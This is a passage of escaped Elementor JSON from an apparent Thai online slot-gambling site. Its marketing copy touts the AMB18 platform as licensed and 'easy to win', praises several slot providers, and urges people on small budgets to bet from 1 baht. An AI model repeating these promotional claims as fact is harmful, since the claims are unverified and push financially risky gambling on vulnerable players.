\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e04\\u0e32\\u0e27\\u0e1a\\u0e2d\\u0e22\\u0e2a\\u0e38\\u0e14\\u0e14\\u0e38\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e14 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e16\\u0e39\\u0e01\\u0e04\\u0e31\\u0e14\\u0e2a\\u0e23\\u0e23\\u0e08\\u0e32\\u0e01\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e43\\u0e1a\\u0e2d\\u0e19\\u0e38\\u0e0d\\u0e32\\u0e15\\u0e16\\u0e39\\u0e01\\u0e15\\u0e49\\u0e2d\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e15\\u0e34\\u0e18\\u0e23\\u0e23\\u0e21 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e22\\u0e31\\u0e07\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e23\\u0e47\\u0e27\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e42\\u0e2b\\u0e25\\u0e14\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e17\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e19\\u0e47\\u0e15\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-3-1-1.webp\",\"id\":353,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e2a\\u0e38\\u0e14\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14 \\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e32\\u0e22\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e08\\u0e38\\u0e14\\u0e41\\u0e02\\u0e47\\u0e07\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e02\\u0e2d\\u0e07 AMB18 \\u0e2a\\u0e38\\u0e14\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32<\\/span> <span style=\\\"font-weight: 400;\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 <\\/span><b>\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e27\\u0e1a\\u0e23\\u0e27\\u0e21\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e08\\u0e32\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e21\\u0e32\\u0e44\\u0e27\\u0e49\\u0e43\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e38\\u0e48\\u0e19\\u0e27\\u0e32\\u0e22 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22 \\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e08\\u0e31\\u0e14\\u0e08\\u0e49\\u0e32\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e16\\u0e35\\u0e48 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e0b\\u0e34\\u0e23\\u0e4c\\u0e1f\\u0e40\\u0e27\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e27\\u0e2d\\u0e23\\u0e4c\\u0e0a\\u0e31\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e17\\u0e35\\u0e48\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e08\\u0e36\\u0e07\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"933afcf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21 PG SLOT<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e43\\u0e19\\u0e04\\u0e48\\u0e32\\u0e22\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e17\\u0e35\\u0e48\\u0e02\\u0e32\\u0e14\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e04\\u0e37\\u0e2d PG SLOT \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e2d\\u0e25\\u0e31\\u0e07\\u0e01\\u0e32\\u0e23 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e21\\u0e35\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e41\\u0e25\\u0e30\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e01\\u0e23\\u0e30\\u0e15\\u0e38\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e47\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e21\\u0e14\\u0e38\\u0e25 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e16\\u0e36\\u0e07\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49\\u0e08\\u0e36\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e43\\u0e19\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e\\u0e41\\u0e25\\u0e30\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21 JOKER GAMING<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">JOKER GAMING \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e08\\u0e31\\u0e01\\u0e01\\u0e31\\u0e19\\u0e14\\u0e35\\u0e43\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e18\\u0e35\\u0e21\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e41\\u0e19\\u0e27\\u0e40\\u0e2d\\u0e40\\u0e0a\\u0e35\\u0e22\\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e15\\u0e30\\u0e27\\u0e31\\u0e19\\u0e15\\u0e01\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e19\\u0e40\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e16\\u0e39\\u0e01\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e20\\u0e32\\u0e1e \\u0e20\\u0e32\\u0e1e\\u0e44\\u0e21\\u0e48\\u0e01\\u0e23\\u0e30\\u0e15\\u0e38\\u0e01 \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e36\\u0e07\\u0e40\\u0e01\\u0e21\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e2a\\u0e23\\u0e34\\u0e21\\u0e17\\u0e31\\u0e1e \\u0e08\\u0e36\\u0e07\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e23\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e25\\u0e38\\u0e49\\u0e19\\u0e01\\u0e33\\u0e44\\u0e23\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e43\\u0e19\\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e17\\u0e35\\u0e48\\u0e40\\u0e23\\u0e49\\u0e32\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21 JILI SLOT<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">JILI SLOT \\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e43\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e19\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e1b\\u0e25\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e2b\\u0e25\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e04\\u0e32\\u0e14\\u0e44\\u0e21\\u0e48\\u0e16\\u0e36\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e42\\u0e17\\u0e19\\u0e2a\\u0e35\\u0e2a\\u0e14\\u0e43\\u0e2a \\u0e14\\u0e36\\u0e07\\u0e14\\u0e39\\u0e14\\u0e2a\\u0e32\\u0e22\\u0e15\\u0e32 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e19\\u0e48\\u0e32\\u0e40\\u0e1a\\u0e37\\u0e48\\u0e2d \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\\u0e41\\u0e19\\u0e27\\u0e17\\u0e32\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u00a0<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cbf6885\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-1-1.webp\",\"id\":351,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\" AMB18 \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c \\u0e41\\u0e21\\u0e49\\u0e21\\u0e35\\u0e07\\u0e1a\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e34\\u0e2a\\u0e23\\u0e30 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e07\\u0e1a\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c\\u0e41\\u0e21\\u0e49\\u0e21\\u0e35\\u0e07\\u0e1a\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e34\\u0e2a\\u0e23\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e15\\u0e48\\u0e33\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e1a\\u0e04\\u0e38\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e44\\u0e14\\u0e49\\u0e07\\u0e48\\u0e32\\u0e22\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e32\\u0e21\\u0e07\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e07\\u0e27\\u0e25\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33\\u0e2a\\u0e39\\u0e07\\u0e40\\u0e01\\u0e34\\u0e19\\u0e44\\u0e1b 